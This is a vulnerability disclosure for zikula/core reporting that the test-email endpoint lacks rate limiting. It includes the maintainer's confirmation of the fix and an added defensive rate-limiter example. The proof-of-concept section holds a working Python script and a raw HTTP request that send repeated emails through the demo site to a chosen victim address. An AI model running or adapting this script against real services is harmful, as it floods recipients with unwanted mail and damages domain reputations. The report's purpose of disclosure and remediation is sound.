Insufficient Granularity of Access Control in zikula/core

Valid

Reported on

Jan 3rd 2022


Description

When sending test emails, you're able to spam a target email address with as many emails as an attacker wants to a victim's email address due to lack of rate limiting (/mailer/config/test). I've put together a simple Python script that exploits this and would allow you to send a custom number of emails to any victim's email address.

Proof of Concept

# spammailer.py
# Example usage: python3 spammailer.py -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email "fuspehulmi@vusra.com"

import requests, argparse

def spammer(csrfToken, cookie, email, subject, message):
    data = {
        "zikulamailermodule_test[toName]": "Test",
        "zikulamailermodule_test[toAddress]": email,
        "zikulamailermodule_test[subject]": subject,
        "zikulamailermodule_test[messageType]": "text",
        "zikulamailermodule_test[bodyHtml]": "",
        "zikulamailermodule_test[bodyText]": message,
        "zikulamailermodule_test[test]": "",
        "zikulamailermodule_test[_token]": csrfToken
    }
    headers = {
    "Host": "demo.ziku.la",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": str(len(data)),
    "Origin": "https://demo.ziku.la",
    "DNT": "1",
    "Connection": "keep-alive",
    "Referer": "https://demo.ziku.la/mailer/config/test",
    "Cookie": "_zsid=" + cookie,
    "Upgrade-Insecure-Requests": "1",
    "Sec-GPC": "1",
    "TE": "Trailers",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"}
    r = requests.post("https://demo.ziku.la/mailer/config/test", headers=headers, data=data)
    print(r.status_code)

parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="the message of the email")
arguments = parser.parse_args()

# Increase this number within parenthesis to increase the number of emails sent
for i in range(10):
    spammer(arguments.csrf_token, arguments.cookie, arguments.email, arguments.subject, arguments.message)

Request:

POST /mailer/config/test HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.ziku.la/mailer/config/test
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

Impact

The impact of this will be negative on the targeted email address and also negative on the ziku.la domain (and other domains when the web application is hosted using another domain and emails are sent from a different domain), since it's possible that the victim would report the domain as a spam domain, resulting in reputational damage to the domain.

We are processing your report and will contact the zikula/core team within 24 hours. (a year ago)
We have contacted a member of the zikula/core team and are waiting to hear back. (a year ago)
Axel Guckelsberger validated this vulnerability. (a year ago)
1d8 has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Axel Guckelsberger marked this as fixed in 4.0.0 with commit 06dee1. (a year ago)
The fix bounty has been dropped.
This vulnerability will not receive a CVE.

Axel (Maintainer), a year ago:

Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.
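
The kind of control the report asks for, as an added example (not code from the Zikula fix commit or from the report): a sliding-window limiter applied per admin session and per recipient address before a test email is sent. The class names, the limits and the `check` interface are assumptions made for illustration.

```python
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self._events = defaultdict(deque)  # key -> timestamps of accepted events

    def retry_after(self, key):
        """Seconds until `key` may act again; 0.0 if it may act now."""
        now, q = self.clock(), self._events[key]
        while q and now - q[0] >= self.window:
            q.popleft()  # drop events that have left the window
        return 0.0 if len(q) < self.limit else self.window - (now - q[0])

    def record(self, key):
        self._events[key].append(self.clock())


class MailTestGate:
    """Hypothetical guard in front of a test-email handler (limits are assumed)."""

    def __init__(self, clock=time.monotonic):
        self.per_session = SlidingWindowLimiter(3, 60, clock)      # 3 sends/min per session
        self.per_recipient = SlidingWindowLimiter(5, 3600, clock)  # 5 sends/hour per address

    def check(self, session_id, to_address):
        """Return (allowed, retry_after_seconds); record the send only if allowed."""
        # Normalise the address so case/whitespace variants share one bucket.
        keys = [(self.per_session, session_id),
                (self.per_recipient, to_address.strip().lower())]
        wait = max(lim.retry_after(key) for lim, key in keys)
        if wait > 0:
            return False, wait  # caller should answer 429 with a Retry-After header
        for lim, key in keys:
            lim.record(key)
        return True, 0.0
```

In a multi-process deployment the counters would need to live in a shared store rather than in process memory.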
